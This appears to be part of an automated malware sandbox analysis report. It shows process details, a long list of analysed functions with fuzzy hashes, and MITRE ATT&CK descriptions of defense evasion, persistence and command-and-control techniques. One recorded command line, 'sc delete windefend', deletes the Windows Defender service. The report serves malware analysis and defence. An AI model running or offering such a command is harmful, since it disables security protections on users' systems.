Wow64 process (32bit):	false
Commandline:	sc delete windefend
Imagebase:	0x7ff653820000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFD9B8E1EDA Relevance: 1.6, Instructions: 1593COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5430d01484b49cd68b6626db75749e99aae3cb393c3d9398e6356f0b8c41afe
Instruction ID: ff517ce8e8331e8b417dc24ec5bbee9714682e660e59e0057a30f70da5452770
Opcode Fuzzy Hash: f5430d01484b49cd68b6626db75749e99aae3cb393c3d9398e6356f0b8c41afe
Instruction Fuzzy Hash: 43D23270A096CD8FDBA6EF28C864BE87BE1FF5A340F4501A6D44DCB2A2DE345A45C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E2354 Relevance: 1.0, Instructions: 996COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d0c5940a1878e23c107654b33c26e7caf890b36247d55f34db537b2872e4123
Instruction ID: 60bb7c86f4368a4e62632d502c783e99556a6b4ad7977b1608df30e66c53910c
Opcode Fuzzy Hash: 7d0c5940a1878e23c107654b33c26e7caf890b36247d55f34db537b2872e4123
Instruction Fuzzy Hash: 0E822370A196CD8FDBAAEF28C864BD87BE1FF5A340F4501A6D44DCB2A6DE345A40C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E0501 Relevance: .7, Instructions: 659COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f5afbfc9f3a30b2a4a489bcc88e5576fa598d818e01efe1c1382a68b32ceeb
Instruction ID: 19fbbeb880a1342b5c616b3bcd77355015d7bd8fc5f14ba1a87301b3d73736cd
Opcode Fuzzy Hash: 90f5afbfc9f3a30b2a4a489bcc88e5576fa598d818e01efe1c1382a68b32ceeb
Instruction Fuzzy Hash: 4102282172D64B4FF72DAB6888626B537D0EF49319F1908BDE4CAC71E3E91CE5068711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E000A Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4651637b6dc72894dd062b747177e54082ad52cac06a1b3ac7439bad31db98ea
Instruction ID: 9039d63de369f58911817cd851b08637de6ab6444cc0d0ad873827e5d5f01a62
Opcode Fuzzy Hash: 4651637b6dc72894dd062b747177e54082ad52cac06a1b3ac7439bad31db98ea
Instruction Fuzzy Hash: 1DE1C32171D68A4FD76A9B7888657B53BE0EF4A300F0A05FAE48ACB1E3DE189D058751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E1443 Relevance: .7, Instructions: 688COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c78a43d9dcfe5d46c1160e48acd4bf25fc9a1c47a886eccb57afd13b96dcd98
Instruction ID: a0effe64ca04bc4a98c0ac4113b62c434ac05e44c83930504cafafc9fce8490a
Opcode Fuzzy Hash: 4c78a43d9dcfe5d46c1160e48acd4bf25fc9a1c47a886eccb57afd13b96dcd98
Instruction Fuzzy Hash: F342F3706196CD8FEBA6EF2CC854BD83BE1FF1A340F4501A6D85CCB2A6DA749A44C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E3AEB Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d0eb412acd590fb4146876753d1f51c381b86cc69011ee2fa9676e388c8d0f7
Instruction ID: ecc3d0778444fb3c25a32bea16cdecad91b636bcb659a53f6cfafa8b55ea2eff
Opcode Fuzzy Hash: 3d0eb412acd590fb4146876753d1f51c381b86cc69011ee2fa9676e388c8d0f7
Instruction Fuzzy Hash: 4ED1C521B1EA8A4FEB9BA76844647787BD1EF5A300F4601F9D45DCB2E7DE28AC448301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E0FA5 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb2d3e4637d2f3ce9ff580edc9208c98e6179538fb15c8d956f02e711dffc1f
Instruction ID: 13da000d207200a3a5210b4bc68c9127dbc4b37a130c2b2e2e23d2c3b1db433c
Opcode Fuzzy Hash: fcb2d3e4637d2f3ce9ff580edc9208c98e6179538fb15c8d956f02e711dffc1f
Instruction Fuzzy Hash: C9E17770A096CD8FEBA5EF68C854BE83BE1FF19340F5501A6E84CCB2A2DB349944C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E4055 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6453115031fd5bb141d27f9f35adffedf89545e5d435720042742c656275efd3
Instruction ID: 58b1382454c3ef0205702c1c23047aff94b6d234f85da7a64d394679999b812c
Opcode Fuzzy Hash: 6453115031fd5bb141d27f9f35adffedf89545e5d435720042742c656275efd3
Instruction Fuzzy Hash: A6C19211B1E78A0FE746EB2888717687BE2EF4A344F5505FAE05DC72E7DE286D048341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E3809 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce474a88684b5b67bd8694ff3f2d5914df39a3609c20417e8e532b027700ac89
Instruction ID: c32dea575883240df4fc9aa70099aad7b20590f5f5ca0a82fd65410c64daeda2
Opcode Fuzzy Hash: ce474a88684b5b67bd8694ff3f2d5914df39a3609c20417e8e532b027700ac89
Instruction Fuzzy Hash: FBB1B461B0E68A4FE79BAB6844347787BE1EF0A310F4601F9D45DCB2E7DE18AD448352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E4ECA Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a56d55af906000fdc138cb7c3aabe8a816eeb3f623363fae6abbccc4bcab34
Instruction ID: 20788228acb4a0b6216adcf0f2f777084cbcfd40d4631e26f79895baa3a1deef
Opcode Fuzzy Hash: e8a56d55af906000fdc138cb7c3aabe8a816eeb3f623363fae6abbccc4bcab34
Instruction Fuzzy Hash: EAB1896060E7CE5FE7AA9F6484747F93BD0AF0A300F5900FAE44DCB1A3DA689A44C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E3E25 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 290848c9955875e7d3670db6b12ded9786b8c5c2ca70c6318220550326a06d32
Instruction ID: f04968c35144f8017b6d14436f5d107ecc25520c5cc63268bcf5db3e9063558c
Opcode Fuzzy Hash: 290848c9955875e7d3670db6b12ded9786b8c5c2ca70c6318220550326a06d32
Instruction Fuzzy Hash: 65911D60A0E7C94FE756EB648464BB87FE1EF4A304F4A41FAD04DCB1E3DA289904C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E028D Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3f5e9fc47eb89c6bc38452760e9982a960b3935786a16b03f11fca803764912
Instruction ID: 6ed50e85a5aa86e9694e55967cdfc52ed06ce2b0fc22297af50f62c2d2c0eacf
Opcode Fuzzy Hash: b3f5e9fc47eb89c6bc38452760e9982a960b3935786a16b03f11fca803764912
Instruction Fuzzy Hash: 3871073071C50A4FEBA9AB6C849AAB833D1EF5C311F0A05B9D44EC71A2DE18EC069351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E3495 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3887e79ed8d7d0a83cf4d118465ae5befd433c086c4121f89fc0645b36dbc4
Instruction ID: b14f7c2d03284d4226e49e9353d8d95b9740b5d0a7f9d0ba6138aa85b192c830
Opcode Fuzzy Hash: 7d3887e79ed8d7d0a83cf4d118465ae5befd433c086c4121f89fc0645b36dbc4
Instruction Fuzzy Hash: 1A51D721B0D64A0FE75EAB749861AB977D1EF49300F5200BAE45EC72E7DE28AD058352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E0B61 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3eb70f29ce861d63ad1ce25e25302d50035a7049173031ca4f6c9233b4b988
Instruction ID: 06bcb43655d6aac173c7306138afa2bc9adfe00ef7895e9ed75105dac6e515fc
Opcode Fuzzy Hash: 0b3eb70f29ce861d63ad1ce25e25302d50035a7049173031ca4f6c9233b4b988
Instruction Fuzzy Hash: 90516292F1E7C91FE797E77818716646BE2AF5620474A05E7D098CB1F7E91858088322

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E4961 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7520506bacbba345fbc0a619eab082e26a10cb7b99d41a2dc1b3159974419741
Instruction ID: 5365deeeb20c7468aa5ec6624eb13c6f2ae98ef6e216fa50cac1db5d42b56af5
Opcode Fuzzy Hash: 7520506bacbba345fbc0a619eab082e26a10cb7b99d41a2dc1b3159974419741
Instruction Fuzzy Hash: AA41D370609A8D4FDBA9EF688855BE93BE0FF49304F5440AEE44DC7293DE389A48C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E52D6 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d4e164625baa2b91ad7cb9be1eb4287ddc9e802c6a3f93abc36819a833b8d0
Instruction ID: 5fe3199d1e1a692e98cf33ed8f4f97ef7c97a227676340cc36f8408e8f14d58d
Opcode Fuzzy Hash: 57d4e164625baa2b91ad7cb9be1eb4287ddc9e802c6a3f93abc36819a833b8d0
Instruction Fuzzy Hash: 70412671A0D78D5FEB95AF6888667EA7BE0FF49304F0501AAE448C71A3DB3859058782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E59B6 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b882b53b8338299880ce6952f279072a27d727a39c4141dc01d8fbcf396aa307
Instruction ID: 9e1aa11cab10fc2bb32473221eef74030d834515884d5d59103324dea87b7ef7
Opcode Fuzzy Hash: b882b53b8338299880ce6952f279072a27d727a39c4141dc01d8fbcf396aa307
Instruction Fuzzy Hash: 2031EA1070D7C84FE747D7389865BA43FE1DF4B244F4A40EBD489CB1A3DA289949C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E36A9 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69cc24b2238f5656e2a771e6dc8763db1f415626df5369333de427d361cb6946
Instruction ID: fe138354f41967faccfb8672017d84aa7f9f1cf4f1570bd22bd797ee37abbbb9
Opcode Fuzzy Hash: 69cc24b2238f5656e2a771e6dc8763db1f415626df5369333de427d361cb6946
Instruction Fuzzy Hash: 2031D66070D7C85FE757DB389864BA97FE1EF4B300F4A40EAD449CB2A7DA289904C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E36F0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f25dfd1a7ca916b0afa363027fd0975878d0aaa18552ea714ce2070c9247483
Instruction ID: b46c23ed7c1fbd921f56fba21e6ee0abfdc7ec64338274ac87b9930ab43b8344
Opcode Fuzzy Hash: 6f25dfd1a7ca916b0afa363027fd0975878d0aaa18552ea714ce2070c9247483
Instruction Fuzzy Hash: 2C219060B19A8C5FEB86EB2898607A97FE1EF4A340F5500E6D40DCB2DBDA389C448351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E4AED Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16907733a3be6bf2be3b5586c2a7625c04136fb8a24fe653f8db7d9337304cbc
Instruction ID: a582e5474ccb21cf769ef0e79f1f8a100b53bd5966d7cd94ee5bf3f6e7a2e30d
Opcode Fuzzy Hash: 16907733a3be6bf2be3b5586c2a7625c04136fb8a24fe653f8db7d9337304cbc
Instruction Fuzzy Hash: AF11062170D6C90FD756ABB88865BB57FD1EF9A211F0940F9E08CCB1A3ED5899058781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E4BA6 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2e4de65356d81718bedf0e97b8dd65d3f7d7584000902b802cdc7671e7a9a81
Instruction ID: 10a5513e06ee5de0ade4c125c7da1e72b1973ac917036ba70b858ed418ea1060
Opcode Fuzzy Hash: f2e4de65356d81718bedf0e97b8dd65d3f7d7584000902b802cdc7671e7a9a81
Instruction Fuzzy Hash: EAF0C23050D7884FDB8697B48468A647FE0AF96211F0A01EBE088CB1B3DA148C48C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E4B30 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f89a645f42851ad85a18465fb0426629282632f94674fdc5134ad93549e02f7
Instruction ID: 885bd5fb13124c5d2f7fd3ac1b6659754d2bdfc60bdb3d861a8ca493e1fe1cf7
Opcode Fuzzy Hash: 9f89a645f42851ad85a18465fb0426629282632f94674fdc5134ad93549e02f7
Instruction Fuzzy Hash: AFF0F422B05C0E0FDBA4FBAC98A17B973D5EB9C351F01007AE40DC7291DD299C008780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8E37B2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9922a7391ab38d33a82a4a1f3e9841718f1761966cd56133b5a48ee60f6ad154
Instruction ID: 98dcbba1e4c746287a09ceecc31069c6a6fe7eadbdb6b455439e481f911e5bec
Opcode Fuzzy Hash: 9922a7391ab38d33a82a4a1f3e9841718f1761966cd56133b5a48ee60f6ad154
Instruction Fuzzy Hash: D5F0BE20B14A4D5FCB40FFA898509E977A5FF48225F40037AE81CC32D6DB38A5449341

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

